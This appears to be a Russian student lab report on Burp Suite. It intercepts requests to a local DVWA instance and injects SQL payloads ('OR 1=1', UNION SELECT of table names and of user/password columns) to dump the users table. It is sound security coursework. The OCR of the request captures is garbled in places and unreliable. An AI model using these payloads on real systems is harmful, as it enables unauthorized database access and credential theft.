Индивидуальный проект - этап 5

Алькамаль Ибрахим Мохсейн Мохаммед Али¹ 19 марта, 2025, Москва, Россия

¹Российский Университет Дружбы Народов

Цели и задачи работы

Цель лабораторной работы

Целью данной работы является изучение приложения BurpSuite.

лабораторной работы _____

Процесс выполнения

Введение

Burp Suite – это набор инструментов для тестирования безопасности веб-приложений. Этот инструмент используется для обнаружения уязвимостей, анализа трафика и проведения различных атак на веб-приложения, таких как XSS, SQL-инъекции и другие.

Burp Suite используется специалистами по безопасности, пентестерами и исследователями для:

- Поиска и анализа уязвимостей веб-приложений.
- Перехвата и анализа сетевого трафика.
- Автоматизации атак на веб-приложения.
- Оценки уровня защиты приложений.

SQL-инъекции – это тип уязвимости, который позволяет злоумышленникам выполнять произвольные SQL-запросы в базе данных через приложение. Это может привести к несанкционированному доступу к данным, их модификации или даже удалению.

SQL-инъекция возникает, когда приложение не корректно обрабатывает пользовательский ввод и включает его в SQL-запросы. Злоумышленники могут вставить (инъектировать) свои SQL-коды в вводимые данные, которые затем выполняются базой данных.

Работа перехватчика запросов

```
Prequest to http://localhost:80 [127.0.0.1]
                                                              Open browser
 1 POST /DWA/vulnerabilities/sqli/ HTTP/1.1
 9 Content-Length: 18
 4 Cache-Control: max-ape=0
 5 sec-ch-us: "Not-A.Brand"; v="99", "Chromium"; v="124"
 6 sec-ch-ua-mobile: 70
 7 sec-ch-us-platform: "Linus"
 8 Upgrade-Insecure-Requests: 1
 g Origin: http://localhost
10 Content-Type: application/x-www-form-urlencoded
11 User-Agent: Mozilla/5.0 (Nindows NT 10.0; Win64; x64) AppleMebRit/537.36 (NHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
12 Accept: text/html.application/xhtml:xml.application/xml:o=0.9.image/avif.image/webp.image/apnp.*/*:o=0.8.application/signed-exchange:v=b3:o=0.7
13 Sec-Petch-Site: same-origin
14 Sec-Fetch-Mode: navigate
15 Sec-Petch-User: 71
16 Sec-Fetch-Dest: document
17 Referer: http://localhost/DVMA/vulnerabilities/sqli/
18 Accept Encoding: gzip, deflate, br
19 Accept-Language: en-US.en;q=0.9
20 Cookie: PHPSESSID=lrkf8k7dmbk3fqefgt939a98tn; security=medium
21 Connection: close
20 ide16SubmiteSubmit
```

Рис. 1: Перехваченные данные

```
1 POST /OWWA/vulnerabilities/sqli/ HTTP/1.1
  2 Host: localhost
  a Content-Length: 18
  4 Cache-Control: max-age=0
  5 sec-ch-ua: "Not-A.Brand":v="99", "Chromium":v="124"
 6 sec-ch-ua-mobile: 70
 7 sec-ch-ua-platform: "Linux"
 II Upgrade-Insecure-Requests: 1
 9 Origin: http://localhost
10 Content-Type: application/x-www-form-urlencoded
11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (MHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
 12 Accept: text/html.application/xhtml-xml.application/xml;q=0.9.image/avif.image/webp.image/appq,4/*;q=0.8.application/signed-exchange:v=b3:q=0.7
 13 Sec-Fetch-Site: same-origin
14 Sec-Fetch-Mode: navigate
15 Sec-Petch-User: 71
16 Sec-Fetch-Dest: document
17 Referer: http://localhost/DWMA/vulnerabilities/sqli/
 18 Accept Encoding: gzip, deflate, br
 19 Accept - Language: en-US, en: q=0.9
on Cookie: PHPSESSID=1rkf8k7dmbk3foefgt939a98tn: security=medium
21 Connection: close
 23 id=1 OR 1=1#&Submit=Submit
```

Рис. 2: Подмена запроса

Ответ от DVWA



Рис. 3: Реакция на подмену

Теперь попробуем получить имена таблиц, для этого передадим такой запрос

```
1 OR 1=1 UNION SELECT \
NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
```

```
POST /DWWA/vulnerabilities/soli/ HTTP/1.1
   2 Host: localhost
   3 Content-Length: 18
 4 Cache-Control: max-age=0
5 Sec-ch-us: "Not-A.Brand";v="99", "Chromium";v="124"
 6 sec-ch-ua-mobile: 70
7 sec-ch-ua-platform: "Linux"
 g Upgrade-Insecure-Requests: 1
   9 Origin: http://localhost
 10 Content-Type: application/x-www-form-urlencoded
 User-Agent: MozillayS.0 (Mindows NT 10.0; Win64; x64) AppleWebKit/587.96 (KHTPL, like Gecko) Chrome/124.0.6367.118 Safari/597.96
 12 Accept: text/html, application/shtml.xml, application/sitgl-xml, y=0.9; image/avif, image/avip, ima
13 Sec-Fetch-Site: same-origin
 14 Sec-Fetch-Mode: navigate
15 Sec-Petch-User: 71
 16 Sec-Fetch-Dest: document
 17 Referer: http://localhost/DVMA/vulnerabilities/soli/
18 Accept-Encoding: gzip, deflate, br
19 Accept Language: en-US.en:q=0.9
To Cookie: PHPSESSID-1rkf8/7debksforfot939a98tn: security=medium
21 Connection: close
22 id=1 OR 1=1 UNION SELECT MULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#$51bmit=Submit
```

Рис. 4: Подмена запроса

Ответ от DVWA

First name: Surname: INNODB SYS TABLES ID: 1 OR 1-1 UNION SELECT NULL.TABLE NAME FROM INFORMATION SCHEMA.TABLES# First name: Surname: INNODB SYS COLUMNS ID: 1 OR 1-1 UNION SELECT NULL, TABLE NAME FROM INFORMATION SCHEMA. TABLES# First name: Surname: INNODB SYS TABLESPACES ID: 1 OR 1=1 UNION SELECT NULL, TABLE NAME FROM INFORMATION SCHEMA. TABLES# First name: Surname: INNODB SYS INDEXES ID: 1 OR 1=1 UNION SELECT NULL.TABLE NAME FROM INFORMATION SCHEMA.TABLES# First name: Surname: INNODB BUFFER PAGE ID: 1 OR 1=1 UNION SELECT NULL, TABLE NAME FROM INFORMATION SCHEMA. TABLES# First name: Surname: INNODB SYS VIRTUAL ID: 1 OR 1-1 UNION SELECT NULL.TABLE NAME FROM INFORMATION SCHEMA.TABLES# First name: Surname: user variables ID: 1 OR 1-1 UNION SELECT NULL, TABLE NAME FROM INFORMATION SCHEMA. TABLES# First name: Surname: INNODE TABLESPACES ENCRYPTION ID: 1 OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES# First name: Surname: INNODB_LOCK_WAITS ID: 1 OR 1=1 UNION SELECT NULL, TABLE NAME FROM INFORMATION SCHEMA, TABLES# First name: Surname: THREAD POOL STATS ID: 1 OR 1=1 UNION SELECT NULL, TABLE NAME FROM INFORMATION SCHEMA. TABLES# First name: Surname: questbook ID: 1 OR 1=1 UNION SELECT NULL.TABLE NAME FROM INFORMATION SCHEMA.TABLES# First name: Surname: users

Рис. 5: Реакция на подмену

Попробуем получить данные пользователей из таблицы users.

1 OR 1=1 UNION SELECT USER, PASSWORD FROM users#

```
POST /DWW/vulnerabilities/sqli/ HTTP/1.1
   Host: localhost
 3 Content-Length: 18
 4 Cache-Control: max-age=0
 sec-ch-ua: "Not-A.Brand": v=199". "Chromium": v="124"
 6 sec-ch-ua-mobile: 70
 7 sec-ch-ua-platform: "Linux"
 8 Upgrade-Insecure-Requests: 1
 9 Origin: http://localhost
10 Content-Type: application/x-www-form-urlancoded
11 User-Apent: Mozilla/5.0 (Windows NT 10.0) Win64: x64) AppleWebKit/597.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
2. Accept: text/html,application/shtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apmg,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
18 Sec-Fetch-Site: same-origin
14 Sec-Fetch-Mode: navigate
15 Sec-Fetch-User: 71
16 Sec-Fetch-Dest: document
17 Referer: http://localhost/DWWA/vulnerabilities/sqli/
18 Accept-Encoding: gzip, deflate, br
| Accept-Language: en-US, en:ge-O;
| Accept-Language: en-US, en:ge-O;
| Cookie: PMPSESSID=1rkf8k7dmbk3fqefqt989e98tn; security=medium
21 Connection: close
23 Id-1 OR 1-1 UNION SELECT USER, PASSWORD FROM users#6Submit-Submit
```

Рис. 6: Подмена запроса

Ответ от DVWA



Рис. 7: Реакция на подмену

Выводы по проделанной работе

Вывод

Мы изучили возможности BurpSuite.